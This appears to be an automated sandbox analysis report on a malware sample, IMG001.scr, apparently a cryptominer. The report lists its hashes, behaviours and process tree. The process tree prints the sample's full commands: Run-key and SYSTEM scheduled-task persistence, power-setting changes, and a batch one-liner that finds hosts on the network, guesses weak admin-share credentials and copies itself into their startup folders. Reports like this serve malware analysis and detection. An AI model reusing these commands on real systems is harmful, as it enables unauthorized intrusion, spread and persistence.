Analysis
-
max time kernel
147s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
04-08-2023 08:19
Static task
static1
Behavioral task
behavioral1
Sample
IMG001.scr
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
IMG001.scr
Resource
win10v2004-20230703-en
General
-
Target
IMG001.scr
-
Size
3.4MB
-
MD5
fbbcf1e9501234d6661a0c9ae6dc01c9
-
SHA1
1ca9759a324159f331e79ea6871ad62040521b41
-
SHA256
d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
-
SHA512
027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140
-
SSDEEP
98304:M5VPnq1y5tQOM33ZNqCtBixHl54Oyjes1Ro6:2VPq1yLanrqTr43eON
Malware Config
Signatures
-
Drops startup file 1 IoCs
Processes:
IMG001.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk IMG001.exe -
Executes dropped EXE 1 IoCs
Processes:
IMG001.exepid process 1616 IMG001.exe -
Loads dropped DLL 5 IoCs
Processes:
IMG001.exepid process 1616 IMG001.exe 1616 IMG001.exe 1616 IMG001.exe 1616 IMG001.exe 1616 IMG001.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exeIMG001.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" IMG001.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
IMG001.exedescription ioc process File opened (read-only) \??\E: IMG001.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\UAC.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe nsis_installer_1 C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe nsis_installer_2 C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe nsis_installer_1 C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe nsis_installer_2 C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe nsis_installer_1 C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4780 schtasks.exe 4512 schtasks.exe -
Discovers systems in the same network 1 TTPs 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeShutdownPrivilege 4888 powercfg.exe Token: SeCreatePagefilePrivilege 4888 powercfg.exe Token: SeShutdownPrivilege 3904 powercfg.exe Token: SeCreatePagefilePrivilege 3904 powercfg.exe Token: SeShutdownPrivilege 1684 powercfg.exe Token: SeCreatePagefilePrivilege 1684 powercfg.exe -
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
IMG001.scrIMG001.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2892 wrote to memory of 1616 2892 IMG001.scr IMG001.exe PID 2892 wrote to memory of 1616 2892 IMG001.scr IMG001.exe PID 2892 wrote to memory of 1616 2892 IMG001.scr IMG001.exe PID 1616 wrote to memory of 4140 1616 IMG001.exe cmd.exe PID 1616 wrote to memory of 4140 1616 IMG001.exe cmd.exe PID 1616 wrote to memory of 4140 1616 IMG001.exe cmd.exe PID 1616 wrote to memory of 2476 1616 IMG001.exe cmd.exe PID 1616 wrote to memory of 2476 1616 IMG001.exe cmd.exe PID 1616 wrote to memory of 2476 1616 IMG001.exe cmd.exe PID 1616 wrote to memory of 4320 1616 IMG001.exe cmd.exe PID 1616 wrote to memory of 4320 1616 IMG001.exe cmd.exe PID 1616 wrote to memory of 4320 1616 IMG001.exe cmd.exe PID 1616 wrote to memory of 3764 1616 IMG001.exe cmd.exe PID 1616 wrote to memory of 3764 1616 IMG001.exe cmd.exe PID 1616 wrote to memory of 3764 1616 IMG001.exe cmd.exe PID 4140 wrote to memory of 1656 4140 cmd.exe reg.exe PID 4140 wrote to memory of 1656 4140 cmd.exe reg.exe PID 4140 wrote to memory of 1656 4140 cmd.exe reg.exe PID 3764 wrote to memory of 4888 3764 cmd.exe powercfg.exe PID 3764 wrote to memory of 4888 3764 cmd.exe powercfg.exe PID 3764 wrote to memory of 4888 3764 cmd.exe powercfg.exe PID 2476 wrote to memory of 4780 2476 cmd.exe schtasks.exe PID 2476 wrote to memory of 4780 2476 cmd.exe schtasks.exe PID 2476 wrote to memory of 4780 2476 cmd.exe schtasks.exe PID 4320 wrote to memory of 4512 4320 cmd.exe schtasks.exe PID 4320 wrote to memory of 4512 4320 cmd.exe schtasks.exe PID 4320 wrote to memory of 4512 4320 cmd.exe schtasks.exe PID 3764 wrote to memory of 3904 3764 cmd.exe powercfg.exe PID 3764 wrote to memory of 3904 3764 cmd.exe powercfg.exe PID 3764 wrote to memory of 3904 3764 cmd.exe powercfg.exe PID 3764 wrote to memory of 1684 3764 cmd.exe powercfg.exe PID 3764 wrote to memory of 1684 3764 cmd.exe powercfg.exe PID 3764 wrote to memory of 1684 3764 cmd.exe powercfg.exe PID 1616 wrote to memory of 3040 1616 IMG001.exe cmd.exe PID 1616 wrote to memory of 3040 1616 IMG001.exe cmd.exe PID 1616 wrote to memory of 3040 1616 IMG001.exe cmd.exe PID 3040 wrote to memory of 1268 3040 cmd.exe cmd.exe PID 3040 wrote to memory of 1268 3040 cmd.exe cmd.exe PID 3040 wrote to memory of 1268 3040 cmd.exe cmd.exe PID 1268 wrote to memory of 948 1268 cmd.exe net.exe PID 1268 wrote to memory of 948 1268 cmd.exe net.exe PID 1268 wrote to memory of 948 1268 cmd.exe net.exe PID 1268 wrote to memory of 3616 1268 cmd.exe find.exe PID 1268 wrote to memory of 3616 1268 cmd.exe find.exe PID 1268 wrote to memory of 3616 1268 cmd.exe find.exe PID 1268 wrote to memory of 3448 1268 cmd.exe ARP.EXE PID 1268 wrote to memory of 3448 1268 cmd.exe ARP.EXE PID 1268 wrote to memory of 3448 1268 cmd.exe ARP.EXE PID 1268 wrote to memory of 3036 1268 cmd.exe find.exe PID 1268 wrote to memory of 3036 1268 cmd.exe find.exe PID 1268 wrote to memory of 3036 1268 cmd.exe find.exe PID 3040 wrote to memory of 2208 3040 cmd.exe cmd.exe PID 3040 wrote to memory of 2208 3040 cmd.exe cmd.exe PID 3040 wrote to memory of 2208 3040 cmd.exe cmd.exe PID 3040 wrote to memory of 3660 3040 cmd.exe cmd.exe PID 3040 wrote to memory of 3660 3040 cmd.exe cmd.exe PID 3040 wrote to memory of 3660 3040 cmd.exe cmd.exe PID 3660 wrote to memory of 660 3660 cmd.exe net.exe PID 3660 wrote to memory of 660 3660 cmd.exe net.exe PID 3660 wrote to memory of 660 3660 cmd.exe net.exe PID 3660 wrote to memory of 764 3660 cmd.exe find.exe PID 3660 wrote to memory of 764 3660 cmd.exe find.exe PID 3660 wrote to memory of 764 3660 cmd.exe find.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\IMG001.scr"C:\Users\Admin\AppData\Local\Temp\IMG001.scr" /S1⤵
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ3⤵
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ4⤵
- Adds Run key to start application
PID:1656 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Creates scheduled task(s)
PID:4780 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0003⤵
- Suspicious use of WriteProcessMemory
PID:3764 -
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:4888 -
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:3904 -
C:\Windows\SysWOW64\powercfg.exePowercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0004⤵
- Suspicious use of AdjustPrivilegeToken
PID:1684 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4512 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=1806& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))3⤵
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"4⤵
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\SysWOW64\net.exenet view5⤵
- Discovers systems in the same network
PID:948 -
C:\Windows\SysWOW64\find.exefind /i "\\"5⤵PID:3616
-
C:\Windows\SysWOW64\ARP.EXEarp -a5⤵PID:3448
-
C:\Windows\SysWOW64\find.exefind /i " 1"5⤵PID:3036
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_4⤵PID:2208
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.127.0.1|find /i " "4⤵
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Windows\SysWOW64\net.exenet view \\10.127.0.15⤵
- Discovers systems in the same network
PID:660 -
C:\Windows\SysWOW64\find.exefind /i " "5⤵PID:764
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3B
MD58a80554c91d9fca8acb82f023de02f11
SHA15f36b2ea290645ee34d943220a14b54ee5ea5be5
SHA256ca3d163bab055381827226140568f3bef7eaac187cebd76878e0b63e9e442356
SHA512ca4b6defb8adcc010050bc8b1bb8f8092c4928b8a0fba32146abcfb256e4d91672f88ca2cdf6210e754e5b8ac5e23fb023806ccd749ac8b701f79a691f03c87a
-
Filesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
Filesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
Filesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
Filesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
Filesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
Filesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
Filesize
3.4MB
MD5fbbcf1e9501234d6661a0c9ae6dc01c9
SHA11ca9759a324159f331e79ea6871ad62040521b41
SHA256d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
SHA512027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140
-
Filesize
3.4MB
MD5fbbcf1e9501234d6661a0c9ae6dc01c9
SHA11ca9759a324159f331e79ea6871ad62040521b41
SHA256d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
SHA512027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140
-
Filesize
3.4MB
MD5fbbcf1e9501234d6661a0c9ae6dc01c9
SHA11ca9759a324159f331e79ea6871ad62040521b41
SHA256d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
SHA512027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140